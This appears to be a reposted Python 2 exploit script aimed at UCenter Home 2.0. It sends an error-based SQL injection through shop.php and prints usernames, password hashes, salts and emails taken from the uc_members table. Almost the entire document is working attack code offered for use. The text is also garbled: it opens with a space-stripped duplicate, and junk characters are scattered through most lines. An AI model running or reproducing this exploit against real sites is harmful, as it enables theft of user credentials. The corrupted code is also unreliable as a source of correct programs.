#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
7 e5 n& K9 Q. r+ p; N) Q# B1 G* @ ' X O8 w6 C, t, B# j! m
9 y% ^4 `6 i* a
#!/usr/bin/env python
, ?, B6 Y1 z! }3 [( n6 x 6 I8 }3 ^6 ~* ^. q5 L7 G
import sys * V# z" G* R. K0 _# |
import urllib2
, h+ a z* @* R: c- P T2 w. timport re
i, ~ ?5 I' E7 S & }0 x" }! G3 p/ ]! T
def info():
; S! X3 k& n2 H$ K print 'From:http://www.exploit-db.com/exploits/14997/' * o+ g. Y. w6 n+ O5 Z
print 'http://www.hake.cc/Web_loudong/'
1 ^3 w2 ]! z# u) C+ E( `/ d6 O print 'changed:qiaoy' 6 @6 [. b+ B& j* h8 P6 n
print 'exp:'
2 ]2 |8 f9 ?% V: I+ V print ' ./UCenter_Home_2.0.py site' 4 |- V5 m' V* _* I
3 P/ i) W. W) h, p p# S
def main():
& n8 A0 }4 f$ k- _ if len(sys.argv) != 2: / q$ a8 }; `' i$ ^6 i5 y
info() 3 G4 ?) Y$ P9 c2 ?$ j
else: ) J: m, w$ H! Z+ |
site = sys.argv[1] 9 F0 i6 g5 F( p _0 S
if site[0:7] == 'http://': ; Z- Z- a8 P. q4 @( }, ]: p. u
sitesite =site 5 x# l' U6 }% D) p2 m% x( x
elif site[0:8] == 'https://': - S8 Q# v) N/ m, K
sitesite = site 0 |! v( o0 F6 `6 U0 Z& @. k
else:
! b. c& A9 ?7 T( k& r3 M( q2 d; G site = 'http://'+site 7 |) W# c8 H5 S2 w. A5 \
try:
! h5 g/ {& \) f) B url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' ! Z" t. {" r8 C( N3 ^- b' F1 k1 |
Value = urllib2.urlopen(url).read()
& x) r/ q4 p/ L2 n6 o4 E' D1 J! |/ ? Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] 1 D M+ w0 p5 T! \$ D3 ~* d4 p
hacked = Msg.split(':')
4 x8 i$ z" w0 N& S: U/ i* ` print 'Name: '+hacked[1] ! o5 o# f l3 P) D& I8 i
print 'Passwd: '+hacked[2]
1 U# a& _/ N6 g8 y, t- h) Y" q print 'salt: '+hacked[3]
0 O, r3 O5 G3 d" U print 'email: '+hacked[4]
5 `# }% u0 h6 j; P except: 0 ]+ m0 c* g- l7 a: |$ {7 S$ r
print 'Sorry,I can\'t work............'
' C9 y1 @# |; w2 A! [! U' `
) m: `* F0 v" Q: N, Zif __name__ == '__main__':
, Z; u& e# X9 w* W, w( M* t main() |